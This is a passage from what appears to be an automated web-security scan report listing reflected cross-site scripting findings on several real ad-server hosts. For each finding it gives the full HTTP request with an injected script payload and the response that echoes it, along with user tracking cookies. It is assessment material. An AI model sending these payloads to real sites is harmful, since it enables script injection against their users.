#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!+=!$MK!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!+=!$MK!#tM)!!!!+=!$MK!#tn2!!!!+=!$MK!#uE=!!!!#<x9#K!#uJY!!!!1=!$MK!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!+=!$MK!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!.=!$MK!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!+=!$MK!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!+=!$MK!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!.=!$MK!$(S9!!!!*<yq][!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq]["; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:21:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0151.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:21:37 GMT
Pragma: no-cache
Content-Length: 573
Content-Type: text/html
Age: 0
Proxy-Connection: close

C1Qs4Xi5Px9F.b3Ul4Yp5Rb9Vbc01c<script>alert(1)</script>9c8a0fe4eae={"result":{"cpm":73710,"type":3,"ad":"http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEAAAIAAAAAABAAAgAEC2FsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

5.95. http://ad.yieldmanager.com/getbid [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c4fa8<script>alert(1)</script>39e3c2a31b0 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796244&_salt={SDC_RND}&r=1&callback=C1Qs4Xi5Px9F.b3Ul4Yp5Rb9V&cookie=1&flash=1&bvs=&hvs=BBJRMUOOP&u=http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2Fc4fa8<script>alert(1)</script>39e3c2a31b0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!N!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!$<xl/w!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9"; pv1="b!!!!@!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=!>RfM.jTN!!L7_!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=##A-M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wjV!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!%17!!!#G!#wjW!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!'0u!!!#G!#wjX!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!(]!!!!#G!#wjY!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!+[-!!!#G!#wjZ!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!1YB!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%(!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!+=!$MK!!0O<!!!!3=!$MK!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!1=!$MK!!J<E!!!!1=!$MK!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!2=!$MK!!q:E!!!!/=!$MK!!q<+!!!!0=!$MK!!q</!!!!0=!$MK!!q<3!!!!0=!$MK!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!3=!$MK!!vRm!!!!+=!$MK!!vRq!!!!+=!$MK!!vRr!!!!+=!$MK!!vRw!!!!3=!$MK!!vRx!!!!+=!$MK!!vRy!!!!+=!$MK!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!+=!$MK!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!+=!$MM!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!+=!$MK!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!+=!$MK!#6hK!!!!#=!27c!#7.'!!!!+=!$MK!#7.:!!!!+=!$MK!#7.O!!!!+=!$MK!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!+=!$MK!#MTF!!!!+=!$MK!#MTH!!!!+=!$MK!#MTI!!!!+=!$MK!#MTJ!!!!+=!$MK!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!1=!$MK!#SF3!!!!1=!$MK!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!+=!$MK!#UDP!!!!1=!$MK!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!+=!$MK!#ai7!!!!+=!$MK!#ai?!!!!+=!$MK!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!+=!$MK!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!+=!$MK!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!+=!$MK!#tM)!!!!+=!$MK!#tn2!!!!+=!$MK!#uE=!!!!#<x9#K!#uJY!!!!1=!$MK!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!+=!$MK!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!.=!$MK!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!+=!$MK!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!+=!$MK!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!.=!$MK!$(S9!!!!*<yq][!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq]["; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0019.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:16 GMT
Pragma: no-cache
Content-Length: 573
Content-Type: text/html
Age: 0
Proxy-Connection: close

C1Qs4Xi5Px9F.b3Ul4Yp5Rb9V={"result":{"cpm":21525,"type":3,"ad":"http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEAAAIAAAAAABAAAgAEC2FsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAA
...[SNIP]...
34KQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBdB4mZI4TCgJ9xOLGOqa7dL5ylQIvhcT5eLoeAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/c4fa8<script>alert(1)</script>39e3c2a31b0&click=[CLICKURL]"}}

5.96. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/753292

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ddb19<script>alert(1)</script>ee71ca49083 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/753292ddb19<script>alert(1)</script>ee71ca49083?d=AM-00000000030620452 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; fq="86xtm%2C1uo0%7Clkze39"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIY0JnqjRMiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJdoQgEEX%2FhbULwEZN%2F42KI4MCzk3%2FewDTiWZ76z5e1eEFFgyeL8CqfR00NeAJ9MrFbJESJk0tsjDywHgwpjSAsm2zRsF8cZA3k7DYFpHpOhl7q4AhZlHPoHclYZhMzTmqnItppFR8rI5kseaOIPLx6uHmfai4UcMrzh0ppnWwqU2K%2BFeU%2F%2BI86fbk4SmFM79u344OHn17njRui3JjjfrlEYBh8eQNoSQK5zzEAP%2FCwzWsxSDD3opmPxVhm47c184xzX0H6b%2FCk1vperDRrmDcaymtm6LpiExWJ%2BIUt%2BvKFfbvtbC5lCRpeS9hCM8hy4jXQASKXMpKd%2BFzwfv9DQ%3D%3D"; vsd=0@1@4dc982a0@pixel.33across.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 11 May 2011 15:06:56 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/753292ddb19<script>alert(1)</script>ee71ca49083

5.97. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab177'%3balert(1)//f0013846b20 was submitted in the flash parameter. This input was echoed as ab177';alert(1)//f0013846b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1275567D53920110419140505&flash=10ab177'%3balert(1)//f0013846b20&time=3|10:0|-5&redir=http://mpc.mxptint.net/1S1SEA5BB36FS0S8FS5B5S1S12CSFAS53SB18_20CAAFAA_106E834%3f$CTURL$&pos=x&dom=http://www.medicinenet.com&r=0.7241260474547744 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=F0A20400-110B-CEAE-1309-A330013B0102; PRca=|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; 